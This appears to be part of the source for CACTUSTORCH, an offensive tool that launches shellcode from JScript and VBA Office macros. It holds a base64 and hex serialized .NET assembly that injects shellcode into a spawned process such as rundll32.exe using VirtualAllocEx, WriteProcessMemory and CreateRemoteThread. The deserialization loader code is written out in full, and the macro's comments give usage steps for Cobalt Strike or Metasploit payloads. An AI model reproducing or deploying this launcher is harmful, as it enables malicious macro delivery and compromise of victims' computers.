63 | "B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
64 | "dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
65 | "CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
66 | "SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
67 | "cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
68 | "AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
69 | "AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
70 | "bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
71 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
72 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
73 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
74 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA"+
75 | "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
76 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA"+
77 | "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
78 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
79 | "AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"+
80 | "AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"+
81 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA"+
82 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"+
83 | "MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"+
84 | "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"+
85 | "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK"+
86 | "ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK"+
87 | "EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA"+
88 | "BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC"+
89 | "fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP"+
90 | "AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj"+
91 | "fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB"+
92 | "AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA"+
93 | "ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF"+
94 | "kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG"+
95 | "AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I"+
96 | "qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK"+
97 | "ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB"+
98 | "AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG"+
99 | "AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB"+
100 | "AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW"+
101 | "gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD"+
102 | "AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG"+
103 | "ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I"+
104 | "+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW"+
105 | "gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA"+
106 | "EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW"+
107 | "IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg"+
108 | "1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+"+
109 | "BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA"+
110 | "BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA"+
111 | "AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA"+
112 | "CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB"+
113 | "AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG"+
114 | "KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ"+
115 | "ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA"+
116 | "hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ"+
117 | "AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA"+
118 | "5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ"+
119 | "AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB"+
120 | "aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu"+
121 | "ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA"+
122 | "WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB"+
123 | "AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA"+
124 | "AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN"+
125 | "b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S"+
126 | "RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU"+
127 | "RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP"+
128 | "TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB"+
129 | "VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF"+
130 | "VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT"+
131 | "X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP"+
132 | "VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP"+
133 | "UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ"+
134 | "VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU"+
135 | "WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD"+
136 | "UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP"+
137 | "Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J"+
138 | "Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X"+
139 | "SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO"+
140 | "SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy"+
141 | "ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs"+
142 | "cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl"+
143 | "cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW"+
144 | "YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1"+
145 | "dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh"+
146 | "ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli"+
147 | "dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0"+
148 | "cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz"+
149 | "ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5"+
150 | "Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3"+
151 | "WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI"+
152 | "RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n"+
153 | "AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD"+
154 | "VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz"+
155 | "SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ"+
156 | "bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT"+
157 | "ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt"+
158 | "ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp"+
159 | "bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp"+
160 | "YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh"+
161 | "Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU"+
162 | "ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB"+
163 | "ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk"+
164 | "SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ"+
165 | "cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5"+
166 | "AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX"+
167 | "AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE"+
168 | "IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD"+
169 | "Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE"+
170 | "IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA"+
171 | "AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg"+
172 | "BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS"+
173 | "DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB"+
174 | "AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT"+
175 | "VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3"+
176 | "NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
177 | "AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA"+
178 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
179 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
180 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"+
181 | "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"+
182 | "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"+
183 | "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"+
184 | "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"+
185 | "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"+
186 | "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"+
187 | "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"+
188 | "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"+
189 | "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"+
190 | "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"+
191 | "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+
192 | "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"+
193 | "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"+
194 | "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"+
195 | "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"+
196 | "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
197 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
198 | "AAAAAAAAAAAAAAAAADAAAAwAAAB0NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
199 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
200 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
201 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
202 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
203 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
204 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
205 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
206 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
207 | "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"+
208 | "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
209 | var entry_class = 'cactusTorch';
210 |
211 | try {
212 | setversion();
213 | var stm = base64ToStream(serialized_obj);
214 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
215 | var al = new ActiveXObject('System.Collections.ArrayList');
216 | var n = fmt.SurrogateSelector;
217 | var d = fmt.Deserialize_2(stm);
218 | al.Add(n);
219 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
220 | o.flame(binary,code);
221 | } catch (e) {
222 | debug(e.message);
223 | }
224 |
--------------------------------------------------------------------------------
/CACTUSTORCH.vba:
--------------------------------------------------------------------------------
1 | ' ( ) ( )
2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /(
3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\())
4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\
5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_)
6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || |
7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ |
8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_|
9 | '
10 | ' Author: Vincent Yiu (@vysecurity)
11 | ' Credits:
12 | ' - @cn33liz: Inspiration with StarFighter
13 | ' - @tiraniddo: James Forshaw for DotNet2JScript
14 | ' - @armitagehacker: Raphael Mudge for idea of selecting 32 bit version on 64 bit architecture machines for injection into
15 |
16 | ' A VBA shellcode launcher for Macros. This will spawn a 32 bit version of the binary specified and inject shellcode into it.
17 | ' Macro will not need to declare winapi :)
18 |
19 | ' Usage:
20 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example...
21 | ' Generate a 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework
22 | ' Run: cat payload.bin | base64 -w 0 > out.txt
23 | ' Run the payload through splitvba: python splitvba.py out.txt code.txt
24 | ' Copy code.txt into the section specified below.
25 |
26 |
27 |
28 | Public binary As String
29 | Public code As String
30 |
31 | Sub Init()
32 | ' Replace with binary name that you want to inject into. This can be anything that exists both in SYSWOW64 and SYSTEM32
33 | binary = "rundll32.exe"
34 |
35 | code = ""
36 |
37 | ' Paste the output from splitvba.py below here
38 | code = code & "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgB"
39 | code = code & "TM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqz"
40 | code = code & "ckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUA"
41 | code = code & "AAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAA"
42 | code = code & "AAIAAAUAAAAAAAAABQAAAAA"
43 | End Sub
44 |
45 | Private Function decodeHex(hex)
46 | On Error Resume Next
47 | Dim DM, EL
48 | Set DM = CreateObject("Microsoft.XMLDOM")
49 | Set EL = DM.createElement("tmp")
50 | EL.DataType = "bin.hex"
51 | EL.Text = hex
52 | decodeHex = EL.NodeTypedValue
53 | End Function
54 |
55 | Function Run()
56 | Dim serialized_obj
57 | serialized_obj = "0001000000FFFFFFFF010000000000000004010000002253797374656D2E44656C656761746553657269616C697A6174696F"
58 | serialized_obj = serialized_obj & "6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300303033053797374656D2E44656C"
59 | serialized_obj = serialized_obj & "656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E7472792253797374656D2E44656C65"
60 | serialized_obj = serialized_obj & "6761746553657269616C697A6174696F6E486F6C6465722F53797374656D2E5265666C656374696F6E2E4D656D626572496E"
61 | serialized_obj = serialized_obj & "666F53657269616C697A6174696F6E486F6C64657209020000000903000000090400000004020000003053797374656D2E44"
62 | serialized_obj = serialized_obj & "656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E74727907000000047479706508"
63 | serialized_obj = serialized_obj & "617373656D626C79067461726765741274617267657454797065417373656D626C790E746172676574547970654E616D650A"
64 | serialized_obj = serialized_obj & "6D6574686F644E616D650D64656C6567617465456E747279010102010101033053797374656D2E44656C6567617465536572"
65 | serialized_obj = serialized_obj & "69616C697A6174696F6E486F6C6465722B44656C6567617465456E74727906050000002F53797374656D2E52756E74696D65"
66 | serialized_obj = serialized_obj & "2E52656D6F74696E672E4D6573736167696E672E48656164657248616E646C657206060000004B6D73636F726C69622C2056"
67 | serialized_obj = serialized_obj & "657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6237"
68 | serialized_obj = serialized_obj & "376135633536313933346530383906070000000774617267657430090600000006090000000F53797374656D2E44656C6567"
69 | serialized_obj = serialized_obj & "617465060A0000000D44796E616D6963496E766F6B650A04030000002253797374656D2E44656C656761746553657269616C"
70 | serialized_obj = serialized_obj & "697A6174696F6E486F6C646572030000000844656C65676174650774617267657430076D6574686F64300307033053797374"
71 | serialized_obj = serialized_obj & "656D2E44656C656761746553657269616C697A6174696F6E486F6C6465722B44656C6567617465456E747279022F53797374"
72 | serialized_obj = serialized_obj & "656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A6174696F6E486F6C646572090B000000090C"
73 | serialized_obj = serialized_obj & "000000090D00000004040000002F53797374656D2E5265666C656374696F6E2E4D656D626572496E666F53657269616C697A"
74 | serialized_obj = serialized_obj & "6174696F6E486F6C64657206000000044E616D650C417373656D626C794E616D6509436C6173734E616D65095369676E6174"
75 | serialized_obj = serialized_obj & "7572650A4D656D626572547970651047656E65726963417267756D656E7473010101010003080D53797374656D2E54797065"
76 | serialized_obj = serialized_obj & "5B5D090A0000000906000000090900000006110000002C53797374656D2E4F626A6563742044796E616D6963496E766F6B65"
77 | serialized_obj = serialized_obj & "2853797374656D2E4F626A6563745B5D29080000000A010B0000000200000006120000002053797374656D2E586D6C2E5363"
